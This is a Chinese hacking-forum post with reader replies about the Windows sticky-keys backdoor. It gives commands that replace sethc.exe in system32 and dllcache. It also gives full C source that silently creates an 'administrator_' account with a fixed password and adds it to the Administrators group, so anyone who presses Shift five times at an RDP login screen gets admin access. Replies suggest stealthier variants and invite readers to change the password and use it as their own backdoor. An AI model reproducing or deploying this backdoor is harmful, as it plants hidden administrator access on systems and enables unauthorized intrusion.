软件作者：pt007[at]vip.sina.com
信息来源：邪恶八进制信息安全团队(www.eviloctal.com)

注：文章首发I.S.T.O信息安全团队，后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有，转载需注明作者

copy sethc.exe c:\windows\system32\dllcache\sethc.exe
copy sethc.exe c:\windows\system32\sethc.exe

然后连上3389,按5下shift加入administrator_用户，密码Test!@#123

复制内容到剪贴板

代码:

#include <stdio.h>
#include <windows.h>
#include <lm.h>
#pragma comment(lib,"netapi32")

int wmain()
{
USER_INFO_1 ui;
DWORD dwError = 0;


ui.usri1_name = L"administrator_";
ui.usri1_password = L"Test!@#123";
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;
//添加名为administrator_的用户,密码为Test!@#123:
if(NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError) == NERR_Success)
{
//添加成功
//fwprintf(stderr, L"User [administrator_] has been successfully added,password is [Test!@#123]\n");

}
else
{
//添加失败
//fwprintf(stderr, L"Add user administrator_ Error!\n");
return 1;
}

wchar_t szAccountName[100]={0}; //字符数组清0
wcscpy(szAccountName,L"administrator_"); //szAccountName=administrator_
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname=szAccountName;
//把administrator_添加到Administrators组
if( NetLocalGroupAddMembers(NULL,L"Administrators",3,(LPBYTE)&account,1) == NERR_Success )
{
//添加成功
//printf("Add to Administrators success.\n");
return 0;
}
else
{
//添加失败
//printf("Add to Administrators Fail!\n");
return 1;
}
}

这..这..这还不如直接copy %system%/explorer.exe c:\windows\system32\sethc.exe

呵呵，还是粘滞键漏洞，楼上所言甚是。

2003R2 SP2上测试不管用。呵呵。生成这个文件至system32\btdownload.dll

附件呢?

回3楼的,那样的话谁都可以进去逛了.

这个是粘滞键老漏洞， 建议楼主些明白点， 不然很容易误导人的。 现在网上也有很多这方面的文章。

现在都有很多加密的SHIFT后门了..即使那样还能突破.你这个太不安全了

厄.....难道这是个帮助我们练习c的API调用的贴子....

直接写的加用户的程序，没有意义，可以考虑往系统的sethc里插段加用户的代码，这样比较隐蔽，粘滞键还是会探出来。

很多都限制了CMD的使用 加密的现在很多

引用:

原帖由 pivot 于 2008-1-24 21:56 发表
这..这..这还不如直接copy %system%/explorer.exe c:\windows\system32\sethc.exe

如果按照你的方法做的话，那这个后门就成公共厕所了，谁都可以上。那就不是给自己留的后门了。
最早出这个方法的时候的确都这么做，但知道的人多了不就成了公用的了。
竟然还有人同意这方法？

如果各位想用，完全可以修改下源代码里的密码自己用，至少是个比替换explorer强的后门。

似乎已经不能用了~~~~~